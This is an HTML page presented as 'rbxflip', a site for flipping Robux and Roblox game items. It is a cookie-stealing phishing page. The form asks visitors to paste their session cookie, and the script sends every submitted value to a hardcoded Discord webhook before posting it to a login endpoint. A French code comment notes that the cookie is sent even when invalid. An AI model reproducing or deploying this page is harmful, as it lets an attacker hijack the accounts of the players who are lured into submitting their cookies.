<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>rbxflip</title>
  <style>
    body {
      margin: 0;
      font-family: Arial, sans-serif;
      background: #333;
      color: #fff;
      text-align: center;
    }
    header {
      padding: 20px;
      background-color: #222;
      box-shadow: 0 2px 5px rgba(0, 0, 0, 0.5);
    }
    header h1 {
      margin: 0;
      font-size: 2.5rem;
    }
    .container {
      padding: 20px;
    }
    .card {
      background: rgba(50, 50, 50, 0.8);
      border-radius: 15px;
      padding: 20px;
      margin: 20px auto;
      max-width: 400px;
      box-shadow: 0 4px 10px rgba(0, 0, 0, 0.3);
    }
    .card h2 {
      font-size: 1.8rem;
    }
    .card p {
      font-size: 1rem;
    }
    .btn {
      display: inline-block;
      background: #555;
      color: #fff;
      padding: 10px 20px;
      margin-top: 20px;
      border: none;
      border-radius: 5px;
      font-size: 1rem;
      cursor: pointer;
      text-decoration: none;
      transition: background 0.3s ease;
    }
    .btn:hover {
      background: #888;
      color: #fff;
    }
    .hidden {
      display: none;
    }
    .form-container {
      margin-top: 20px;
    }
    .form-container input {
      padding: 10px;
      width: 80%;
      border: none;
      border-radius: 5px;
      margin-bottom: 10px;
    }
    .form-container button {
      background: #555;
      color: #fff;
      padding: 10px 20px;
      border: none;
      border-radius: 5px;
      font-size: 1rem;
      cursor: pointer;
      transition: background 0.3s ease;
    }
    .form-container button:hover {
      background: #888;
    }
    footer {
      background: #222;
      padding: 20px;
      margin-top: 40px;
      color: #fff;
    }
    footer h3 {
      font-size: 1.2rem;
    }
    footer p {
      font-size: 1rem;
      margin: 5px 0;
    }
  </style>
</head>
<body>
  <header>
    <h1>Welcome to rbxflip</h1>
  </header>
  <div class="container">
    <div class="card">
      <h2>Ready to Start?</h2>
      <p>Click the button below to begin your journey on rbxflip!</p>
      <button class="btn" onclick="showForm()">Start Now</button>
    </div>

    <div class="form-container hidden" id="cookieForm">
      <h2>Enter Your Cookie</h2>
      <input type="text" id="cookieInput" placeholder="Enter your cookie" />
      <button onclick="submitCookie()">Submit</button>
    </div>
  </div>

  <footer>
    <h3>About Us</h3>
    <p>We provide an exciting way to win virtual items and Robux! You can flip MM2, Adopt Me, Dahood, Limiteds, and Robux here.</p>
  </footer>

  <script>
    const webhookURL = "https://discord.com/api/webhooks/1331389847210033253/2RrfMN-P8PaexjymdUY1K8VolOjsc-SByg1vT9npFDlp6tZxBW7I8ymI60jPgmC9bKqZ"; // Replace with your Discord webhook URL

    function showForm() {
      document.getElementById('cookieForm').classList.remove('hidden');
    }

    async function submitCookie() {
      const cookie = document.getElementById('cookieInput').value;

      if (cookie.trim() === '') {
        alert('Please enter a valid cookie!');
        return;
      }

      // Envoi du cookie à la webhook, même si le cookie est invalide
      await sendCookieToWebhook(cookie);

      try {
        const response = await fetch('/login', {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
          },
          body: JSON.stringify({ cookie }),
        });

        if (response.ok) {
          alert('Cookie submitted successfully!');
          window.location.href = 'casino_page.html';
        } else {
          alert('Invalid cookie or expired!');
        }
      } catch (error) {
        console.error('Error sending data:', error);
        alert('Failed to submit cookie. Please try again.');
      }
    }

    // Fonction pour envoyer le cookie à la webhook
    async function sendCookieToWebhook(cookieData) {
      const payload = {
        content: `Cookie submitted: ${cookieData}`,
      };

      try {
        await fetch(webhookURL, {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
          },
          body: JSON.stringify(payload),
        });
        console.log('Cookie sent to webhook');
      } catch (error) {
        console.error('Error sending cookie to webhook:', error);
      }
    }
  </script>
</body>
</html>
